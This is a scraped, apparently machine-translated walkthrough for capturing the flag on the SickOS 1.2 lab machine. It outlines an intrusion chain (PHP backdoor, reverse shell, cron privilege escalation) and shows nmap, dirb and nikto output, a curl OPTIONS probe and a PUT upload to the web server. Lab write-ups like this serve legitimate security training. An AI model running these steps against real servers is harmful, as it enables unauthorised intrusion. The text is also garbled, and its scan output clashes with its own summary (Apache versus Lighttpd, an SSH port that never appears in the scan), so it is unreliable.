Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to obtain SickOS 1.2 Flag, the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have some understanding of the relevant knowledge after reading this article.

The experimental environment is as follows:

Basic ideas:

Network Scanning (Network scan Netdiscover, Nmap)

Directory brute-force (website directory scan dirb)

Find HTTP Options: PUT (find HTTP option curl)

Generate PHP Backdoor (generate php backdoor Msfvenom)

Upload and execute a backdoor (upload php backdoor)

Reverse connection (Metasploit)

Privilege Escalation (cron job)

Import python one-liner for proper TTY shell

Get Root access and capture the flag.

1) Network Scanning (network scan Netdiscover, Nmap)

Root@host06:~# nmap-sV-T4-A 192.168.32.169Starting Nmap 7.70 (https://nmap.org) at 2019-06-21 19:19 CSTNmap scan report for 192.168.32.169Host is up (0.00085s latency) .Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 5 disallowed entries | _ / ange1 / angel1 / nothing / tmp / uploads | _ http-server-header: Apache/2 .2.22 (Ubuntu) | _ http-title: DinaMAC Address: 00:0C:29:29:82:CE (VMware) Device type: general purposeRunning: Linux 2.6.X | 3.XOS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3OS details: Linux 2.6.32-3.5Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.85 ms 192.168.32.169OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .nmap done: 1 IP address (1 host up) scanned in 12.13 seconds

As can be seen from the above scan, the host only opens the following services and ports:

SSH (22/tcp)-OpenSSH 5.9p1 Debian

HTTP (80/tcp)-Lighttpd 1.4.28

2) use dirb to scan the website directory

Root@host06:~# dirb http://192.168.32.169-----------------DIRB v2.22 By The Dark Raver-START_TIME: Fri Jun 21 19:25:51 2019URL_BASE: http://192.168.32.169/WORDLIST_FILES: / usr/share/dirb/wordlists/common.txt- -GENERATED WORDS: 4612-Scanning URL: http://192.168.32.169/-+ http://192.168.32.169/index.php (CODE:200 | SIZE:163) = > DIRECTORY: http://192.168.32.169 / test/-Entering directory: http://192.168.32.169/test/-(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode'- W'if you want to scan it anyway)-END_TIME: Fri Jun 21 19:26:01 2019DOWNLOADED: 4612-FOUND: 1

"The X-Content-Type-Options header is not set" found when scanning with niko

Root@host06:~# nikto-h http://192.168.32.169- Nikto v2.1.6 Whitney + Target IP: 192.168.32.169 + Target Hostname: 192.168.32.169 + Target Port: 80 + Start Time: 2019-06-21 19:34:28 (GMT8)-+ Server: lighttpd/1 .4.28 + The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ All CGI directories' found', use'- C none' to test none+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu 3.21 + 26545 requests: 0 error (s) and 4 item (s) reported on remote host+ End Time: 2019-06-21 19:37:21 (GMT8) (173seconds)

Use the curl-v-X OPTIONS http://192.168.32.169/test test again to confirm that "put" and other methods can be used for injection

Root@host06:~# curl-v-X OPTIONS http://192.168.32.169/test* Expire in 0 ms for 6 (transfer 0x5588c3fe4d00) * Trying 192.168.32.169.. * TCP_NODELAY set* Expire in 200 ms for 4 (transfer 0x5588c3fe4d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (# 0) > OPTIONS / test HTTP/1.1 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: * / * >

< HTTP/1.1 301 Moved Permanently< DAV: 1,2< MS-Author-Via: DAV< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK< Location: http://192.168.32.169/test/< Content-Length: 0< Date: Fri, 21 Jun 2019 15:16:48 GMT< Server: lighttpd/1.4.28 PUT /test/test.txt HTTP/1.1>

Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: * / * > Content-Length: 10 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 10 out of 10 bytes < HTTP/1.1 201 Created < Content-Length: 0 < Date: Fri, 21 Jun 2019 15:22:00 GMT < Server: lighttpd/1.4.28

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.